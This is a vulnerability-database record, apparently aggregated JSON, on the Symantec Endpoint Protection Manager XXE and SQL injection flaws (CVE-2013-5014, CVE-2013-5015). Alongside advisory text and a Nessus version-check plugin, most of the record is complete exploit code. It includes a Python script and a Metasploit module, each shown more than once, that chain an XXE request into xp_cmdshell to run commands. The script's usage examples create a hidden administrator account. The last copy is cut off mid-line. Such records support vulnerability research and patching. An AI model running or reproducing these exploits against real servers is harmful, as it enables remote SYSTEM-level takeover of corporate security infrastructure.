\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich\r\n \r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n \r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n \r\nInterested in working with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n \r\nEOF Stefan Viehb\u00f6ck / @2014\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87397", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "description": "Added: 02/24/2014 \nCVE: [CVE-2013-5014](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5014>) \nBID: [65466](<http://www.securityfocus.com/bid/65466>) \nOSVDB: [103306](<http://www.osvdb.org/103306>) \n\n\n### Background\n\nSymantec Endpoint Protection, by Symantec Corporation, is an antivirus and personal firewall product designed to be centrally managed in corporate environments by the Symantec Endpoint Protection Manager (SEPM). The SEPM management console listens on TCP port 9090. \n\n### Problem\n\nThe management console for Symantec Endpoint Protection Manager is vulnerable to External XML Entity (XXE) injection (CVE-2013-5014) due to improper sanitization of external XML data. This vulnerability could potentially allow unauthorized access to restricted server-side data and console management functionality. Symantec Endpoint Protection Manager's management console is also vulnerable to SQL injection (CVE-2013-5015) due to insufficient sanitization of local queries made against the backend database. The XXE injection vulnerability can be leveraged to exploit the local access SQL injection vulnerability. \n\n### Resolution\n\nApply the updates as described in Symantec Security Advisory [SYM14-004](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00>). \n\n### References\n\n<http://www.zdnet.com/attackers-scanning-for-symantec-endpoint-protection-manager-flaw-7000026418/> \n<http://secunia.com/advisories/cve_reference/CVE-2013-5014/> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5015> \n<http://secunia.com/advisories/cve_reference/CVE-2013-5015/> \n<http://osvdb.org/show/osvdb/103306> \n\n\n### Limitations\n\nThis exploit was tested against the default Symantec Endpoint Protection Manager installation using embedded database on Windows Server 2003. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2014-02-24T00:00:00", "published": "2014-02-24T00:00:00", "id": "SAINT:01A0A55CF2FF358B33D64AB1C283DE12", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/symantec_epm_xxe_sql_inj", "title": "Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:23", "bulletinFamily": "exploit", "description": "Added: 02/24/2014 \nCVE: [CVE-2013-5014](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5014>) \nBID: [65466](<http://www.securityfocus.com/bid/65466>) \nOSVDB: [103306](<http://www.osvdb.org/103306>) \n\n\n### Background\n\nSymantec Endpoint Protection, by Symantec Corporation, is an antivirus and personal firewall product designed to be centrally managed in corporate environments by the Symantec Endpoint Protection Manager (SEPM). The SEPM management console listens on TCP port 9090. \n\n### Problem\n\nThe management console for Symantec Endpoint Protection Manager is vulnerable to External XML Entity (XXE) injection (CVE-2013-5014) due to improper sanitization of external XML data. This vulnerability could potentially allow unauthorized access to restricted server-side data and console management functionality. Symantec Endpoint Protection Manager's management console is also vulnerable to SQL injection (CVE-2013-5015) due to insufficient sanitization of local queries made against the backend database. The XXE injection vulnerability can be leveraged to exploit the local access SQL injection vulnerability. \n\n### Resolution\n\nApply the updates as described in Symantec Security Advisory [SYM14-004](<http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00>). \n\n### References\n\n<http://www.zdnet.com/attackers-scanning-for-symantec-endpoint-protection-manager-flaw-7000026418/> \n<http://secunia.com/advisories/cve_reference/CVE-2013-5014/> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5015> \n<http://secunia.com/advisories/cve_reference/CVE-2013-5015/> \n<http://osvdb.org/show/osvdb/103306> \n\n\n### Limitations\n\nThis exploit was tested against the default Symantec Endpoint Protection Manager installation using embedded database on Windows Server 2003. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2014-02-24T00:00:00", "published": "2014-02-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/symantec_epm_xxe_sql_inj", "id": "SAINT:45CE4FFC463D53C01F466061A94C2555", "type": "saint", "title": "Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-02-21T01:20:48", "bulletinFamily": "scanner", "description": "The version of Symantec Endpoint Protection Manager (SEPM) running on the remote host is either 11.x prior to 11.0 RU7-MP4a or 12.x prior to 12.1 RU4a. It is, therefore, affected by multiple vulnerabilities:\n\n - SEPM is affected by an XML external entity injection vulnerability due to a failure to properly sanitize user-supplied input. A remote, unauthenticated attacker could potentially exploit this vulnerability to read arbitrary files. (CVE-2013-5014)\n\n - SEPM is affected by a SQL injection vulnerability due to a failure to properly sanitize user-supplied input. A locally authenticated user could potentially exploit this vulnerability to execute arbitrary SQL commands against the back-end database. (CVE-2013-5015)", "modified": "2018-11-15T00:00:00", "id": "SYMANTEC_ENDPOINT_PROT_MGR_SYM14-004.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72542", "published": "2014-02-17T00:00:00", "title": "Symantec Endpoint Protection Manager < 11.0 RU7-MP4a / 12.1 RU4a Multiple Vulnerabilities (SYM14-004)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(72542);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2013-5014\", \"CVE-2013-5015\");\n script_bugtraq_id(65466, 65467);\n script_xref(name:\"EDB-ID\", value:\"31853\");\n\n script_name(english:\"Symantec Endpoint Protection Manager < 11.0 RU7-MP4a / 12.1 RU4a Multiple Vulnerabilities (SYM14-004)\");\n script_summary(english:\"Checks SEPM version\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Symantec Endpoint Protection Manager installed on the\nremote host is affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Symantec Endpoint Protection Manager (SEPM) running on\nthe remote host is either 11.x prior to 11.0 RU7-MP4a or 12.x prior to\n12.1 RU4a. It is, therefore, affected by multiple vulnerabilities:\n\n - SEPM is affected by an XML external entity injection\n vulnerability due to a failure to properly sanitize\n user-supplied input. A remote, unauthenticated attacker\n could potentially exploit this vulnerability to read\n arbitrary files. (CVE-2013-5014)\n\n - SEPM is affected by a SQL injection vulnerability due to\n a failure to properly sanitize user-supplied input. A\n locally authenticated user could potentially exploit\n this vulnerability to execute arbitrary SQL commands\n against the back-end database. (CVE-2013-5015)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/531128/30/0/threaded\");\n # https://support.symantec.com/en_US/article.SYMSA1287.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?296dadaa\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to 11.0 RU7-MP4a / 12.1 RU4a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:endpoint_protection_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"symantec_endpoint_prot_mgr_installed.nasl\");\n script_require_keys(\"SMB/sep_manager/path\", \"SMB/sep_manager/ver\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('SMB/sep_manager/ver');\npath = get_kb_item_or_exit('SMB/sep_manager/path');\n\nmajor_ver = split(display_ver, sep:'.', keep:FALSE);\nmajor_ver = int(major_ver[0]);\n\nfixed_ver = make_array(\n 11, '11.0.7405.1424',\n 12, '12.1.4023.4080'\n);\n\nif (ver_compare(ver:display_ver, fix:fixed_ver[major_ver], strict:FALSE) == -1)\n{\n set_kb_item(name:'www/0/SQLInjection', value:TRUE);\n\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : '+ path +\n '\\n Installed version : '+ display_ver +\n '\\n Fixed version : '+ fixed_ver[major_ver] +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Symantec Endpoint Protection Manager', display_ver, path);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-14T13:52:09", "bulletinFamily": "exploit", "description": "Symantec Endpoint Protection Manager suffers from a remote command execution vulnerability. Versions 11.0, 12.0, and 12.1 are affected.", "modified": "2014-02-24T00:00:00", "published": "2014-02-24T00:00:00", "id": "1337DAY-ID-21940", "href": "https://0day.today/exploit/description/21940", "type": "zdt", "title": "Symantec Endpoint Protection Manager Remote Command Execution Exploit", "sourceData": "import argparse\r\nimport httplib\r\n \r\n\"\"\"\r\nExploit Title: Symantec Endpoint Protection Manager Remote Command Execution\r\nExploit Author: Chris Graham @cgrahamseven\r\nCVE: CVE-2013-5014, CVE-2013-5015\r\nDate: February 22, 2014\r\nVendor Homepage: http://www.symantec.com/endpoint-protection\r\nVersion: 11.0, 12.0, 12.1\r\nTested On: Windows Server 2003, default SEPM install using embedded database\r\nReferences: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00\r\nDetails:\r\n \r\nFirst off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE\r\ninjection to force SEPM to exploit itself through a separate SQL injection flaw was\r\nparticularly amusing. I suspect the majority of SEPM users will have it configured\r\nwith the default embedded database, thereby making this a pretty reliable exploit.\r\n \r\nSo basically what you are looking for with the XXE injection is a vulnerability\r\nthat can be triggered in the ConsoleServlet. When a multipart http request is sent,\r\nthe servlet will use a custom MultipartParser class to handle the individual\r\nmultipart bodies. When a body is encountered that uses a Content-Type of text/xml,\r\nthe Java DocumentBuilder class is used to parse the xml. Since Symantec did not\r\ndisallow declared DTD processing, it is vulnerable to the XXE injection. This\r\nappears to be a blind XXE, so a better use of the vulnerability is use it for SSRF.\r\nThat leads us to the SQL injection flaw.\r\n \r\nSymantec has an http request handler called ConfigServerHandler that is programmatically\r\nrestricted to only handle requests that come from localhost. I guess when they wrote this\r\nthey just assumed that there was never going to be a way to send untrusted input to it\r\nsince it was always going to be controlled by them. I base this guess on the fact that\r\nthere is absolutely no attempt made to validate what input comes in to the\r\nupdateReportingVersion function which shoves it directly into a SQL query unfiltered. In\r\norder to trigger the SQL injection you just need to send the SQL injection string in the\r\n\"Parameter\" url param with the \"action\" param set to test_av. On a default install of SEPM,\r\nit uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell\r\nstored procedure to run local OS commands. Using this stored procedure, you can compromise\r\nthe server that is running SEPM.\r\n \r\nExample Usage:\r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c \"net user myadmin [email\u00a0protected]!23 /add\"\r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c \"net localgroup Administrators myadmin /add\"\r\n\"\"\"\r\n \r\nmultipart_body = \\\r\n\"------=_Part_156_33010715.1234\\r\\n\" + \\\r\n\"Content-Type: text/xml\\r\\n\" + \\\r\n\"Content-Disposition: form-data; name=\\\"Content\\\"\\r\\n\\r\\n\" + \\\r\n\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\r\\n\" + \\\r\n\"<!DOCTYPE sepm [<!ENTITY payload SYSTEM \" + \\\r\n\"\\\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av\" + \\\r\n\"&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\\\" >]>\\r\\n\" + \\\r\n\"<request>\\r\\n\" + \\\r\n\"<xxe>&payload;</xxe>\\r\\n\" + \\\r\n\"</request>\\r\\n\" + \\\r\n\"------=_Part_156_33010715.1234--\\r\\n\"\r\nheaders = {'Content-Type':\"multipart/form-data; boundary=\\\"----=_Part_156_33010715.1234\\\"\"}\r\n \r\ncmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \\\r\n' Remote Command Execution')\r\ncmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True)\r\ncmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \\\r\ntype=int, required=False)\r\ncmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \\\r\ndefault=0, type=int, required=False)\r\ncmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie \"net user\")', \\\r\nrequired=True)\r\nargs = cmdline_parser.parse_args()\r\n \r\nif args.ssl == 1:\r\n conn = httplib.HTTPSConnection(args.ip, args.port)\r\nelse:\r\n conn = httplib.HTTPConnection(args.ip, args.port)\r\nmultipart_body = multipart_body % (args.cmd)\r\nprint \"\\n[*]Attempting to exploit XXE and run local windows command: \" + args.cmd\r\nconn.request(\"POST\", \"/servlet/ConsoleServlet?ActionType=ConsoleLog\", multipart_body, headers)\r\nres = conn.getresponse()\r\nif res.status != 200:\r\n print \"[-]Exploit unsuccessful! Server returned:\\n\" + res.read()\r\nelse:\r\n print \"[+]Exploit successfully sent!\"\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21940"}, {"lastseen": "2018-02-06T05:08:27", "bulletinFamily": "exploit", "description": "This Metasploit module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker can reach SQL injection affected components. As xp_cmdshell is enabled in the included database instance, it's possible to execute arbitrary system commands on the remote system with SYSTEM privileges.", "modified": "2014-02-26T00:00:00", "published": "2014-02-26T00:00:00", "id": "1337DAY-ID-21946", "href": "https://0day.today/exploit/description/21946", "type": "zdt", "title": "Symantec Endpoint Protection Manager Remote Command Execution", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/powershell'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include REXML\r\n include Msf::Exploit::CmdStagerVBS\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager\r\n versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker\r\n can reach SQL injection affected components. As xp_cmdshell is enabled in the included\r\n database instance, it's possible to execute arbitrary system commands on the remote system\r\n with SYSTEM privileges.\r\n },\r\n 'Author' =>\r\n [\r\n 'Stefan Viehbock', # Discovery\r\n 'Chris Graham', # PoC exploit\r\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-5014' ],\r\n [ 'CVE', '2013-5015' ],\r\n [ 'EDB', '31853'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n ['Windows VBS Stager', {}]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Feb 24 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(9090),\r\n OptString.new('TARGETURI', [true, 'The base path', '/'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n })\r\n\r\n if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Sending payload\")\r\n # Execute the cmdstager, max length of the commands is ~3950\r\n execute_cmdstager({:linemax => 3950})\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.\r\n command = \"0x#{Rex::Text.to_hex(\"cmd /c #{cmd}\", '')}\"\r\n\r\n # Generate random 'xx032xxxx' sequence number.\r\n seqnum = \"#{rand_text_numeric(2)}032#{rand_text_numeric(4)}\"\r\n\r\n soap = soap_request(seqnum, command)\r\n\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(soap, \"text/xml\", nil, \"form-data; name=\\\"Content\\\"\")\r\n xxe = post_data.to_s\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),\r\n 'method' => 'POST',\r\n 'vars_get' => { 'ActionType' => 'ConsoleLog' },\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => xxe,\r\n })\r\n\r\n if res and res.body !~ /ResponseCode/\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong.\")\r\n end\r\n end\r\n\r\n def soap_request(seqnum, command)\r\n randpayload = rand_text_alpha(8+rand(8))\r\n randxxe = rand_text_alpha(8+rand(8))\r\n entity = \"<!ENTITY #{randpayload} SYSTEM \\\"http://127.0.0.1:9090/servlet/ConsoleServlet?\"\r\n entity << \"ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\\\" >\"\r\n\r\n xml = Document.new\r\n xml.add(DocType.new('sepm', \"[ METASPLOIT ]\"))\r\n xml.add_element(\"Request\")\r\n xxe = xml.root.add_element(randxxe)\r\n xxe.text = \"PAYLOAD\"\r\n\r\n xml_s = xml.to_s\r\n xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding\r\n xml_s.gsub!(/PAYLOAD/, \"&#{randpayload};\") # To avoid html encoding\r\n\r\n xml_s\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21946"}], "exploitdb": [{"lastseen": "2016-02-03T15:46:57", "bulletinFamily": "exploit", "description": "Symantec Endpoint Protection Manager Remote Command Execution. CVE-2013-5014. Remote exploit for windows platform", "modified": "2014-02-26T00:00:00", "published": "2014-02-26T00:00:00", "id": "EDB-ID:31917", "href": "https://www.exploit-db.com/exploits/31917/", "type": "exploitdb", "title": "Symantec Endpoint Protection Manager - Remote Command Execution", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/powershell'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include REXML\r\n include Msf::Exploit::CmdStagerVBS\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager\r\n versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker\r\n can reach SQL injection affected components. As xp_cmdshell is enabled in the included\r\n database instance, it's possible to execute arbitrary system commands on the remote system\r\n with SYSTEM privileges.\r\n },\r\n 'Author' =>\r\n [\r\n 'Stefan Viehbock', # Discovery\r\n 'Chris Graham', # PoC exploit\r\n 'xistence <xistence[at]0x90.nl>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-5014' ],\r\n [ 'CVE', '2013-5015' ],\r\n [ 'EDB', '31853'],\r\n [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]\r\n ],\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n ['Windows VBS Stager', {}]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => 'Feb 24 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(9090),\r\n OptString.new('TARGETURI', [true, 'The base path', '/'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n })\r\n\r\n if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Sending payload\")\r\n # Execute the cmdstager, max length of the commands is ~3950\r\n execute_cmdstager({:linemax => 3950})\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.\r\n command = \"0x#{Rex::Text.to_hex(\"cmd /c #{cmd}\", '')}\"\r\n\r\n # Generate random 'xx032xxxx' sequence number.\r\n seqnum = \"#{rand_text_numeric(2)}032#{rand_text_numeric(4)}\"\r\n\r\n soap = soap_request(seqnum, command)\r\n\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(soap, \"text/xml\", nil, \"form-data; name=\\\"Content\\\"\")\r\n xxe = post_data.to_s\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),\r\n 'method' => 'POST',\r\n 'vars_get' => { 'ActionType' => 'ConsoleLog' },\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => xxe,\r\n })\r\n\r\n if res and res.body !~ /ResponseCode/\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong.\")\r\n end\r\n end\r\n\r\n def soap_request(seqnum, command)\r\n randpayload = rand_text_alpha(8+rand(8))\r\n randxxe = rand_text_alpha(8+rand(8))\r\n entity = \"<!ENTITY #{randpayload} SYSTEM \\\"http://127.0.0.1:9090/servlet/ConsoleServlet?\"\r\n entity << \"ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\\\" >\"\r\n\r\n xml = Document.new\r\n xml.add(DocType.new('sepm', \"[ METASPLOIT ]\"))\r\n xml.add_element(\"Request\")\r\n xxe = xml.root.add_element(randxxe)\r\n xxe.text = \"PAYLOAD\"\r\n\r\n xml_s = xml.to_s\r\n xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding\r\n xml_s.gsub!(/PAYLOAD/, \"&#{randpayload};\") # To avoid html encoding\r\n\r\n xml_s\r\n end\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31917/"}, {"lastseen": "2016-02-03T15:38:08", "bulletinFamily": "exploit", "description": "Symantec Endpoint Protection Manager 11.0, 12.0, 12.1 - Remote Command Execution Exploit. CVE-2013-5014,CVE-2013-5015. Remote exploit for windows platform", "modified": "2014-02-23T00:00:00", "published": "2014-02-23T00:00:00", "id": "EDB-ID:31853", "href": "https://www.exploit-db.com/exploits/31853/", "type": "exploitdb", "title": "Symantec Endpoint Protection Manager 11.0, 12.0, 12.1 - Remote Command Execution Exploit", "sourceData": "import argparse\r\nimport httplib\r\n\r\n\"\"\"\r\nExploit Title: Symantec Endpoint Protection Manager Remote Command Execution\r\nExploit Author: Chris Graham @cgrahamseven\r\nCVE: CVE-2013-5014, CVE-2013-5015\r\nDate: February 22, 2014\r\nVendor Homepage: http://www.symantec.com/endpoint-protection\r\nVersion: 11.0, 12.0, 12.1\r\nTested On: Windows Server 2003, default SEPM install using embedded database\r\nReferences: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00\r\nDetails:\r\n\r\nFirst off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE \r\ninjection to force SEPM to exploit itself through a separate SQL injection flaw was \r\nparticularly amusing. I suspect the majority of SEPM users will have it configured\r\nwith the default embedded database, thereby making this a pretty reliable exploit.\r\n\r\nSo basically what you are looking for with the XXE injection is a vulnerability \r\nthat can be triggered in the ConsoleServlet. When a multipart http request is sent, \r\nthe servlet will use a custom MultipartParser class to handle the individual \r\nmultipart bodies. When a body is encountered that uses a Content-Type of text/xml, \r\nthe Java DocumentBuilder class is used to parse the xml. Since Symantec did not \r\ndisallow declared DTD processing, it is vulnerable to the XXE injection. This \r\nappears to be a blind XXE, so a better use of the vulnerability is use it for SSRF.\r\nThat leads us to the SQL injection flaw.\r\n\r\nSymantec has an http request handler called ConfigServerHandler that is programmatically \r\nrestricted to only handle requests that come from localhost. I guess when they wrote this \r\nthey just assumed that there was never going to be a way to send untrusted input to it \r\nsince it was always going to be controlled by them. I base this guess on the fact that \r\nthere is absolutely no attempt made to validate what input comes in to the \r\nupdateReportingVersion function which shoves it directly into a SQL query unfiltered. In \r\norder to trigger the SQL injection you just need to send the SQL injection string in the \r\n\"Parameter\" url param with the \"action\" param set to test_av. On a default install of SEPM, \r\nit uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell \r\nstored procedure to run local OS commands. Using this stored procedure, you can compromise \r\nthe server that is running SEPM. \r\n\r\nExample Usage: \r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c \"net user myadmin p@ss!23 /add\"\r\npython sepm_xxe_exploit.py -t 192.168.1.100 -c \"net localgroup Administrators myadmin /add\"\r\n\"\"\"\r\n\r\nmultipart_body = \\\r\n\"------=_Part_156_33010715.1234\\r\\n\" + \\\r\n\"Content-Type: text/xml\\r\\n\" + \\\r\n\"Content-Disposition: form-data; name=\\\"Content\\\"\\r\\n\\r\\n\" + \\\r\n\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\r\\n\" + \\\r\n\"<!DOCTYPE sepm [<!ENTITY payload SYSTEM \" + \\\r\n\"\\\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av\" + \\\r\n\"&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\\\" >]>\\r\\n\" + \\\r\n\"<request>\\r\\n\" + \\\r\n\"<xxe>&payload;</xxe>\\r\\n\" + \\\r\n\"</request>\\r\\n\" + \\\r\n\"------=_Part_156_33010715.1234--\\r\\n\"\r\nheaders = {'Content-Type':\"multipart/form-data; boundary=\\\"----=_Part_156_33010715.1234\\\"\"}\r\n\r\ncmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \\\r\n' Remote Command Execution')\r\ncmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True)\r\ncmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \\\r\ntype=int, required=False)\r\ncmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \\\r\ndefault=0, 